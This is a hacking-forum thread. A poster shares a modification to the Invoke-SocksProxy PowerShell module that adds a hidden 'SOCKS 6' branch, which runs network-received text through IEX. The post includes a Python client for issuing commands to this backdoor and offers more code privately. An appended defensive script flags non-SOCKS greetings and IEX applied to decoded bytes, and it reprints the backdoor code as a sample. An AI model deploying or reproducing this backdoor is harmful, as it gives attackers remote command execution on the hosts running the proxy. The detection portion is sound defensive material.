[Reverse socks] GitHub project improvement for RCE
by guilimix - October 19, 2020 at 09:35 AM
#1
Very useful tool for reverse socks in powershell: https://github.com/p3nt4/Invoke-SocksProxy

It doesn't have command execution; here is my hack to add this feature:

Modify Invoke-SocksProxy.psm1 to add handling for a "SOCKS 6" version:

if ($socksVer -eq 6){
    # second byte of the client greeting carries the command length
    $lencmd = [int]$buffer[1];
    $data = New-Object System.Byte[] $lencmd;
    $cliStream.Read($data,0,$lencmd) | Out-Null;
    # evaluate the received text and send the result back, terminated by a marker
    $res = IEX([system.Text.Encoding]::UTF8.GetString($data));
    $cliStream.Write([system.Text.Encoding]::UTF8.GetBytes($res+"--MAGIC-TOKEN--"));
}


And here is the Python script to talk to this new backdoor:

import socket, sys

HOST = sys.argv[1]  # usually 127.0.0.1
PORT = int(sys.argv[2])
COMMAND = sys.argv[3]

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    # "version" byte 0x06, one length byte, then the UTF-8 command text
    s.send(b'\x06' + bytes([len(COMMAND)]) + COMMAND.encode("utf-8"))
    data = b""
    # read until the terminating marker arrives
    while data.decode("utf-8").count("--MAGIC-TOKEN--") < 1:
        data += s.recv(2014)
    print(data.replace(b"--MAGIC-TOKEN--", b"").decode("utf-8"))



PM me for the full code; a C# version is also available.
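From a defender's side, the modification above leaves two simple fingerprints: SOCKS only defines versions 4 and 5, so a client greeting that starts with 0x06 is a protocol anomaly, and the module now pipes bytes read off the network straight into IEX. The following script is an added example written for this thread; it is not part of the poster's code or of the upstream Invoke-SocksProxy project. The sample greetings and the sample PowerShell source are constructed here for illustration, and the regex and function names are my own.

```python
"""Defensive checks for a tampered SOCKS proxy module.

Two independent checks a blue team can run:
  1. classify_socks_greeting(): flag client greetings whose version byte is
     not 4 or 5 (the poster's private "version 6" falls out here).
  2. find_eval_on_network_data(): flag PowerShell lines that decode a byte
     buffer and hand the text to IEX / Invoke-Expression.
All sample data below is constructed for this example.
"""
import re

MAGIC_TOKEN = b"--MAGIC-TOKEN--"  # reply terminator used by the posted code


def classify_socks_greeting(payload: bytes) -> str:
    """Return a label for the first bytes a client sends to a SOCKS port."""
    if not payload:
        return "empty"
    ver = payload[0]
    if ver == 4:
        return "socks4"
    if ver == 5:
        # SOCKS5 greeting is VER, NMETHODS, then exactly NMETHODS method bytes
        if len(payload) >= 2 and len(payload) == 2 + payload[1]:
            return "socks5"
        return "socks5-malformed"
    # anything else is not SOCKS at all and deserves a closer look
    return f"nonstandard-version-{ver}"


def looks_like_token_framed_reply(payload: bytes) -> bool:
    """True when a server reply ends with the marker the posted client waits for."""
    return payload.endswith(MAGIC_TOKEN)


# Matches IEX(...) / Invoke-Expression(...) applied to the output of an
# Encoding.GetString() call, i.e. evaluating text decoded from raw bytes.
EVAL_PATTERN = re.compile(
    r"(?:IEX|Invoke-Expression)\s*\(\s*\[[^\]]*Encoding\]::\w+\.GetString\(",
    re.IGNORECASE,
)


def find_eval_on_network_data(ps_source: str) -> list[int]:
    """Return 1-based line numbers of PowerShell source that evaluate decoded bytes."""
    hits = []
    for lineno, line in enumerate(ps_source.splitlines(), start=1):
        if EVAL_PATTERN.search(line):
            hits.append(lineno)
    return hits


# Constructed sample: the patched branch as it would appear in the .psm1 file
SAMPLE_PSM1 = """\
if ($socksVer -eq 6){
    $lencmd=[int]$buffer[1];
    $data = New-Object System.Byte[] $lencmd;
    $cliStream.Read($data,0,$lencmd) | Out-Null;
    $res=IEX([system.Text.Encoding]::UTF8.GetString($data));
    $cliStream.Write([system.Text.Encoding]::UTF8.GetBytes($res+"--MAGIC-TOKEN--"));
}
"""

# Constructed sample greetings: a normal SOCKS5 hello and the poster's format
SAMPLE_GREETINGS = {
    "normal": b"\x05\x01\x00",
    "tampered": b"\x06\x06whoami",
}

if __name__ == "__main__":
    for name, greeting in SAMPLE_GREETINGS.items():
        print(f"{name}: {classify_socks_greeting(greeting)}")
    print("suspicious lines in module:", find_eval_on_network_data(SAMPLE_PSM1))
    print("token-framed reply:", looks_like_token_framed_reply(b"user1\r\n" + MAGIC_TOKEN))
```

The greeting check is cheap enough to run inline in a proxy wrapper or over captured first packets, and the source check can be added to whatever job already hashes or lints PowerShell modules on the hosts where the proxy runs.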
#2
Great! Thanks mate for this share!
